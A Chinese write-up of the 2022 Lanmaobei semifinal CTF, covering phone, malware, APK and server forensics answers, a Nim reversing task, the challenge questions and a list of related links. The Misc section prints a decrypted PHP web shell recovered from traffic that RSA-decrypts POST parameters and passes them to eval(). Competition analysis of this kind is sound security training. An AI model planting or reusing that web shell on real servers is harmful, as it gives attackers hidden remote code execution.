文末附取证附件、题目、解压密码

电子取证

手机取证_1

手机取证_2

去看了蓝信的视频，在info.plist

然后+8

2022-01-11 18:47:38

exe分析_1

密码virus，然后开始面向微步做题

C:\Program Files\Common Files\Services\WmiApSvr.exe

exe分析_2

直接搜看看有没有

exe分析_3

svchost.exe

exe分析_4

挖矿

exe分析_5

win7显示的不对，win10那里看

韩国

apk分析_01

hhh，题目问EXEC结果要交红星的

apk分析_02

解base得到https://ansjk.ecxeio.xyz

答案：ansjk.ecxeio.xyz

apk分析_05

和初赛一个附件。不用说了

apk分析_06

直接搜关键词“安全”出答案

apk分析_07

猜的，4和3。答案3，本界面、广告界面、旁边的那个跳转界面。一共3个

apk分析_08

搜com.

apk分析_09

info.plist

d395159c291c627c9d4ff9139bf8f0a700b98732

apk分析_10

info.plist

全选

apk分析_11

www.nansjy.com.cn:8161

apk分析_12

com.example.weisitas526sad.activity.SplashActivity

apk分析_14

哈哈哈哈哈哈哈哈哈哈哈哈哈哈结束之前猜的红星

答案：红星

apk分析_15

即可找到明文username和md5加密后的password

17317289056/b12345678b

服务器取证_05

猜了5不对，猜6对了

Re

babynim

追到NimMainModule()

对比flag格式

取36位。

追进去

是个做乘法的操作，input * a = b

那么b // a == flag

print(51748409119571493927314047697799213641286278894049840228804594223988372501782894889443165173295123444031074892600769905627166718788675801//56006392793428440965060594343955737638876552919041519193476344215226028549209672868995436445345986471)
#923973256239481267349126498121231231

flag{923973256239481267349126498121231231}

Misc

神秘的日志

与ntlm有关的事件id 6038

交了五六十个，最后居然是成功后的第一次登录

直接麻了

system里

时间对应security第一次的登录时间

flag{dafd0428f634aefd1ddb26f8257c791f}

加密的通道

流量包，能发现传输hex之后多了个rsa.php，因此那串hex就是rsa.php，使用cyberchef给dump下来

Www.PHPJiaMi.Com

当时还以为是后面错误所以乱码了，看来不是

官方没有解密的

https://m.php.cn/blog/detail/20670.html

https://blog.csdn.net/qq292913477/article/details/88726944

使用第二个链接的脚本解，得到以下

<?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDieYmLtWbGRSvUtevSlTOozmWR
qEGF4Hfvb1YCoVYAAlhnHnyMk+aLRvLXKgmerWiS+QD6y08Ispuzzn02tHE6d4Qp
DuPiPO9PAdGSXzFVFLK2hOrkXLsDXugNTdVUprdkPPI1YY0ZnMs1bT2Zf2dfuBI5
0S5e5sSOF85kNq/zwwIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
echo $pk;
$cmd = '';
foreach ($cmds as $value) {if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {$cmd .= $de;}
}
foreach($_POST as $k => $v){if (openssl_public_decrypt(base64_decode($v), $de, $pk)) {$_POST[$k]=$de;
}
}
eval($cmd);

em，后面传输了rsa的参数，将最后的eval改成echo，cmd直接改成参数。发现一共传了三个参，其中第一个是蚁剑的，第二个就是传输的东西。发现第4次出现的rsa.php最大

第二条

<?php
$cmd = "yLxWGRCHJBEhtpnW7XTEjZa8U06pkFvEqTea5ISI/LggnmMXPblFZ6sDNJHoym6I0CkQIYr62+8sauFSYOHtPEpFX62kBmMAxi7abHOzQl5FAf2VO5wiezcXRp5nLDfqHCLa0Y8T9kaplu81yXLzXtlhZYgrqMtDsFROJ+ZKNN0=";
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDieYmLtWbGRSvUtevSlTOozmWR
qEGF4Hfvb1YCoVYAAlhnHnyMk+aLRvLXKgmerWiS+QD6y08Ispuzzn02tHE6d4Qp
DuPiPO9PAdGSXzFVFLK2hOrkXLsDXugNTdVUprdkPPI1YY0ZnMs1bT2Zf2dfuBI5
0S5e5sSOF85kNq/zwwIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
echo $pk;
$cmd = '';
foreach ($cmds as $value) {if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {$cmd .= $de;}
}
foreach($_POST as $k => $v){if (openssl_public_decrypt(base64_decode($v), $de, $pk)) {$_POST[$k]=$de;
}
}
echo($cmd);

熟悉的Zmxh

flag{844dfc86da23a4d5283907efaf9791ad}

取证附件、题目、解压密码

2022蓝帽杯取证题目+解压密码+附件
链接：https://pan.baidu.com/s/1AS0wVdjZxt46zaDcDzxdaQ
提取码：scpc
–来自百度网盘超级会员V4的分享

解压密码7(G?fu9A8sdgfMsfsdrfE4q6#cf7af0fc1c

手机取证_1
iPhone手机的iBoot固件版本号:（答案参考格式：iBoot-1.1.1）

手机取证_2
该手机制作完备份UTC+8的时间（非提取时间）:（答案参考格式：2000-01-01 00:00:00）

exe分析_1
文件services.exe创建可执行文件的路径是:（答案参考格式：C:\Windows.exe）

exe分析_2
文件HackTool.FlyStudio.acz_unpack.exe是否调用了advapi32.dll动态函式链接库？
（是/否）

exe分析_3
文件aspnet_wp.v.exe执行后的启动的进程是什么:（答案参考格式：qax.exe）

exe分析_4
文件[4085034a23cccebefd374e4a77aea4f1]是什么类型的木马:（答案参考格式：勒索）

exe分析_5
文件[4085034a23cccebefd374e4a77aea4f1]网络连接的IP地址的归属地是哪个国家:（答案参考格式：美国）

APK分析_01
受害人手机中exec的序列号是:（答案参考格式：0xadc）

APK分析_02
受害人手机中exec关联服务器地址是:（答案参考格式：asd.as.d）

APK分析_03
受害人手机中exec加载服务器的函数是:（答案参考格式：asda）

APK分析_04
受害人手机中exec的打包ID是:（答案参考格式：adb.adb.cn）

APK分析_05
受害人手机中exec的是否有安全检测行为？
是/否

APK分析_06
受害人手机中exec的检测方法的完整路径和方法名是:（答案参考格式：a.a.a()）

APK分析_07
受害人手机中exec有几个界面:（答案参考格式：2）

APK分析_08
受害人手机中红星IPA的包名是:（答案参考格式：a.s.d）

APK分析_09
受害人手机中红星IPA的APIKEY是:（答案参考格式：asd）

APK分析_10
受害人手机中红星IPA的权限有哪些？
[ 多选 ] 相册|定位|摄像头|麦克风

APK分析_11
嫌疑人手机中红星APK的服务器地址是:（答案参考格式：ass.a.d:11）

APK分析_12
嫌疑人手机中红星APK的程序入口是:（答案参考格式：a.v.b.n）

APK分析_13
嫌疑人手机中分析聊天工具，服务器的登录端口是:（答案参考格式：12）

APK分析_14
嫌疑人手机中分析聊天工具，用户归属的机构是:（答案参考格式：太阳）

APK分析_15
结合手机流量分析聊天工具的登录账号和密码是:（答案参考格式：1212311/12312asd）

服务器取证_01
服务器在启动时设置了运行时间同步脚本，请写出脚本内第二行内容。（答案参考格式：/abcd/tmp www.windows.com）

服务器取证_02
服务器在计划任务添加了备份数据库脚本，请写出该脚本的第二行内容。（答案参考格式：2022年第六届蓝帽杯）

服务器取证_03
使用宝塔linux面板的密码加密方式对字符串lanmaobei进行加密，写出加密结果。（答案参考格式：e10adc3949ba59abbe56e057f20f883e）

服务器取证_04
写出服务器中第一次登录宝塔面板的时间。（答案参考格式：2022-02-02 02:02:02）

服务器取证_05
写出宝塔面板的软件商店中已安装软件的个数（答案参考格式：2）

服务器取证_06
写出涉案网站（维斯塔斯）的运行目录路径。（答案参考格式：/root/etc/sssh/html）

服务器取证_07
写出最早访问涉案网站后台的IP地址。（答案参考格式：111.111.111.111）

服务器取证_08
写出涉案网站（维斯塔斯）的“系统版本”号。（答案参考格式：6.6.6666）

服务器取证_09
分析涉案网站的会员层级深度，写出最底层会员是多少层。（答案参考格式：66）

服务器取证_10
请写出存放网站会员等级变化制度的网站代码文件的SHA256值。（答案参考格式： 8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92）

服务器取证_11
计算向网站中累计充值最多的五名会员，获得的下线收益总和(不包含平台赠送)。（答案参考格式：666.66）

服务器取证_12
统计涉案网站中余额大于0且银行卡开户行归属于四川省的潜在受害人数量。（答案参考格式：6）

服务器取证_13
统计平台从成立之初至“2021-07-01 23:59:59”共收益多少金额(不包含平台赠送)。（答案参考格式：6666.66）

服务器取证_14
统计涉案网站哪一天登录的会员人数最多。（答案参考格式：1999-09-09）

服务器取证_15
写出涉案网站中给客服发送“你好，怎么充值”的用户的fusername值。（答案参考格式：lanmaobei666）

蓝帽杯2022年半决赛 writeup(附取证题目+解压密码+附件)相关推荐

1. DeepFashion2服饰数据集下载(附解压密码)

   DeepFashion2服饰数据集下载(附解压密码): https://download.csdn.net/download/stq054188/12185469

2. 蓝帽杯2022初赛电子取证

   手机取证 手机取证_1 直接文件名搜索导出 查看 360x360 手机取证_2 直接搜索姜总,从聊天记录中找到单号 SF1142358694796 计算机取证 计算机取证_1 python vol.p ...

3. 羊城杯2022 部分misc writeup

   文章目录 Misc 签个到 迷失幻境 寻宝-Fix where_is_secret Misc 签个到 凯撒/ROT13,后base32 迷失幻境 回收站获取45与可爱可莉.jpg 45为png,缺失文 ...

4. 蓝桥杯2022年第十三届嵌入式详解

   此前也发了关于蓝桥杯的题目,昨天刚比完赛,放松了一下,没来得及整理,早上我就把我所有的思路整理了一下,发出来,希望能帮到大家.当然也有很多不足的地方,希望大家能提出,我们一起讨论. 首先,关于题目的功 ...

5. 用于图像质量评价的LIVE数据库 百度网盘地址附解压密码

   https://pan.baidu.com/s/1DTsjiesYcRHFo57pWqXcnw  提取码:36qc 压缩文件解压密码:livedatabase2005

6. qq群关系数据库 mysql,腾讯QQ用户群关系数据库泄露下载地址 (附解压密码)

   11月18日消息,据国内安全问题反馈平台乌云爆料,腾讯QQ存在重大安全隐患,致使QQ群关系数据泄露.目前,消息称迅雷快传上已经出现大量QQ群关系数据包的下载,根据QQ群关系数据,可得知个人真实姓名.年 ...

7. 【阿尼亚不会CTF】第六届”蓝帽杯“全国大学生网络安全技能大赛—线上初赛部分writeup

   啊!!!蓝帽杯第一次加入取证模块呢,取证静态分,CTF动态分,这波是出道即C位,完全挤掉CTF,属于被迫做取证题惹~ 菜鸟阿尼亚会做的题不多,以后也要继续加油哦!!! (点名计算机取证出题人--某某某 ...

8. [ctf misc][wp]一些内存取证的wp（含[2021蓝帽杯北部赛区分区赛]博人的文件）

   wp 1.[V&N2020 公开赛]内存取证 1.找策略 volatility.exe -f C:\Users\shen\Downloads\mem.raw imageinfo 2.看进程 v ...

9. P8775 [蓝桥杯 2022 省 A] 青蛙过河

   题目链接:[蓝桥杯 2022 省 A] 青蛙过河 - 洛谷 解法一:打暴力: 二分+模拟 很直接,不解释,肯定超时 代码: #include<iostream> #include<c ...

最新文章

1. Mybatis入门：2(xml形式的增删改查)
2. 苹果、微软等巨头107道机器学习面试题
3. pip命令提示unknown or unsupported command 'install'——python3.7安装PyInstaller经验
4. centos普通用户修改文件权限_centos修改文件及文件夹权限
5. 在百度搜索页添加公司总部的客服电话
6. sqlite 0转换为bit_Cisco Talos在SQLite中发现了一个远程代码执行漏洞
7. 基于模型协同过滤推荐离线召回：ALS
8. 张志华：机器学习的发展历程及启示
9. linux 限速命令,Linux下网卡限速
10. 简便 or 缺陷？Python 内置函数大揭秘！| 技术头条
11. python机器学习案例系列教程——层次聚类（文档聚类）
12. Oracle连续排名,oracle不连续排名rank() over(order by column desc)，连续排名 dense_rank over(order by)...
13. LIBAVCODEC_VERSION_INT是哪里定义的？
14. 将本地的代码提交到github仓库
15. Java基础算法，获得相反数
16. 从行业共生到产业共生——2021 MWC上海展观察
17. java基本变量_Java 基础之变量和基本数据类型
18. 搭建云免流服务器教程,搭建云免流服务器教程
19. 两个分数相加（结果最简）
20. MySQL派生表联表查询记录

热门文章

1. 实现cpu与计算机上所有部件,CPU包含那些部件各部分有什么主要功能
2. 宁盾动态密码案例： 国内某大型油田OA集成dKey动态口令牌认证功能
3. RT-Robot Car DIY活动|基于RT-Thread的智能战车制作教程
4. 编程词典 - Swift version V1.1
5. 步进电机驱动器PCB原理图及其stm32源码S型曲线控制代码本
6. 中央气象台 API接口（json格式）
7. linux 远程 更新 软件下载,rdesktop下载-rdesktop(Unix/Linux下面的远程桌面客户端)下载 v1.8.2 官方最新版-IT猫扑网...
8. 基于微信小程序的求职通系统
9. Capture One Pro 11 Essential Training Capture One Pro 11基本培训 Lynda课程中文字幕
10. mysql判断男显示m_MySQL连表查询练习题